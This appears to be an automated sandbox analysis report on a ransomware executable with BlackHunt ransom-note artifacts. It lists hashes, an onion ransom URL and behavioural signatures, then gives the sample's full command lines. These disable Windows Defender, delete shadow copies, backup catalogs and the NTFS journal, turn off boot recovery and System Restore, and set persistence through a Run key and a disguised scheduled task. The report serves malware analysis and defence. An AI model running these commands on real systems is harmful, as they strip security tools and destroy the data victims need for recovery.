Analysis
-
max time kernel
1s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19/01/2024, 00:52
Static task
static1
Behavioral task
behavioral1
Sample
c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe
Resource
win10v2004-20231222-en
General
-
Target
c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe
-
Size
707KB
-
MD5
c68abb771e144dee2b75aea44d4993cb
-
SHA1
8cba72465dc88cb73de3af56ddb88764afce297f
-
SHA256
c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b
-
SHA512
ae60147bf7dc33d55baa2346b0338d0adfc4d9a3beeb0cdada00e004371c46972658f8c7091860dbd176bfc7b362e646d65e2c522e0608bde25786482a0a3bcc
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1J8svnh:6uaTmkZJ+naie5OTamgEoKxLW0yh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 3176 fsutil.exe 2668 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 4032 wevtutil.exe 2796 wevtutil.exe 3608 wevtutil.exe 1412 wevtutil.exe 3192 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 2176 bcdedit.exe 3404 bcdedit.exe 1784 bcdedit.exe 3160 bcdedit.exe -
pid Process 3576 wbadmin.exe 3776 wbadmin.exe -
Disables use of System Restore points 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe -
Enumerates connected drives 3 TTPs 19 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\T: c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe File opened (read-only) \??\Y: c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe File opened (read-only) \??\G: c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe File opened (read-only) \??\K: c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe File opened (read-only) \??\Z: c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe File opened (read-only) \??\U: c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe File opened (read-only) \??\S: c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe File opened (read-only) \??\H: c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe File opened (read-only) \??\J: c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe File opened (read-only) \??\Q: c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe File opened (read-only) \??\E: c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe File opened (read-only) \??\R: c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe File opened (read-only) \??\I: c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe File opened (read-only) \??\O: c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe File opened (read-only) \??\X: c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe File opened (read-only) \??\W: c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe File opened (read-only) \??\P: c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe File opened (read-only) \??\A: c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe File opened (read-only) \??\L: c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2836 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2928 vssadmin.exe 3240 vssadmin.exe 1644 vssadmin.exe 1652 vssadmin.exe 780 vssadmin.exe 2396 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 1636 taskkill.exe -
Modifies registry class 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1960 PING.EXE -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe Token: SeRestorePrivilege 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe Token: SeBackupPrivilege 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe Token: SeTakeOwnershipPrivilege 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe Token: SeAuditPrivilege 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe Token: SeSecurityPrivilege 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe Token: SeIncBasePriorityPrivilege 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1940 wrote to memory of 2004 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 45 PID 1940 wrote to memory of 2004 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 45 PID 1940 wrote to memory of 2004 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 45 PID 1940 wrote to memory of 2004 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 45 PID 1940 wrote to memory of 2664 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 29 PID 1940 wrote to memory of 2664 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 29 PID 1940 wrote to memory of 2664 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 29 PID 1940 wrote to memory of 2664 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 29 PID 1940 wrote to memory of 2812 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 42 PID 1940 wrote to memory of 2812 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 42 PID 1940 wrote to memory of 2812 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 42 PID 1940 wrote to memory of 2812 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 42 PID 2004 wrote to memory of 2824 2004 cmd.exe 41 PID 2004 wrote to memory of 2824 2004 cmd.exe 41 PID 2004 wrote to memory of 2824 2004 cmd.exe 41 PID 2664 wrote to memory of 2964 2664 cmd.exe 38 PID 2664 wrote to memory of 2964 2664 cmd.exe 38 PID 2664 wrote to memory of 2964 2664 cmd.exe 38 PID 1940 wrote to memory of 2712 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 212 PID 1940 wrote to memory of 2712 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 212 PID 1940 wrote to memory of 2712 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 212 PID 1940 wrote to memory of 2712 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 212 PID 1940 wrote to memory of 2708 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 36 PID 1940 wrote to memory of 2708 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 36 PID 1940 wrote to memory of 2708 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 36 PID 1940 wrote to memory of 2708 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 36 PID 1940 wrote to memory of 2820 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 33 PID 1940 wrote to memory of 2820 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 33 PID 1940 wrote to memory of 2820 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 33 PID 1940 wrote to memory of 2820 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 33 PID 1940 wrote to memory of 2856 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 32 PID 1940 wrote to memory of 2856 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 32 PID 1940 wrote to memory of 2856 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 32 PID 1940 wrote to memory of 2856 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 32 PID 1940 wrote to memory of 2740 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 39 PID 1940 wrote to memory of 2740 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 39 PID 1940 wrote to memory of 2740 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 39 PID 1940 wrote to memory of 2740 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 39 PID 2812 wrote to memory of 2584 2812 cmd.exe 155 PID 2812 wrote to memory of 2584 2812 cmd.exe 155 PID 2812 wrote to memory of 2584 2812 cmd.exe 155 PID 1940 wrote to memory of 1856 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 154 PID 1940 wrote to memory of 1856 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 154 PID 1940 wrote to memory of 1856 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 154 PID 1940 wrote to memory of 1856 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 154 PID 1940 wrote to memory of 2728 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 48 PID 1940 wrote to memory of 2728 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 48 PID 1940 wrote to memory of 2728 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 48 PID 1940 wrote to memory of 2728 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 48 PID 2712 wrote to memory of 2616 2712 cmd.exe 46 PID 2712 wrote to memory of 2616 2712 cmd.exe 46 PID 2712 wrote to memory of 2616 2712 cmd.exe 46 PID 1940 wrote to memory of 2564 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 153 PID 1940 wrote to memory of 2564 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 153 PID 1940 wrote to memory of 2564 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 153 PID 1940 wrote to memory of 2564 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 153 PID 1940 wrote to memory of 2612 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 150 PID 1940 wrote to memory of 2612 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 150 PID 1940 wrote to memory of 2612 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 150 PID 1940 wrote to memory of 2612 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 150 PID 2708 wrote to memory of 2632 2708 cmd.exe 149 PID 2708 wrote to memory of 2632 2708 cmd.exe 149 PID 2708 wrote to memory of 2632 2708 cmd.exe 149 PID 1940 wrote to memory of 2680 1940 c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe 148 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe"C:\Users\Admin\AppData\Local\Temp\c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1940 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2856
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2820
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2712
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2616
-
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:3176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2740
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2584
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2004
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2728
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:1664
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:1324
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1564
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2140
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:356
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1588
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2484
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:1980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2228
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:112
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1104
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2344
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:3160
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2400
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1372
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:616
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1420
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:788
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2240
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\c8eaaf1077e440862b9e3491c6a9132a19b114686a8dfa98e7c989ce35ba574b.exe" /F2⤵PID:2480
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1612
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2448
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1788
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2184
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:320
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2196
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2840
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1380
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2144
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:1560
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:3036
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2680
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2612
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2564
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:1856
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:1436
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:1372
-
-
-
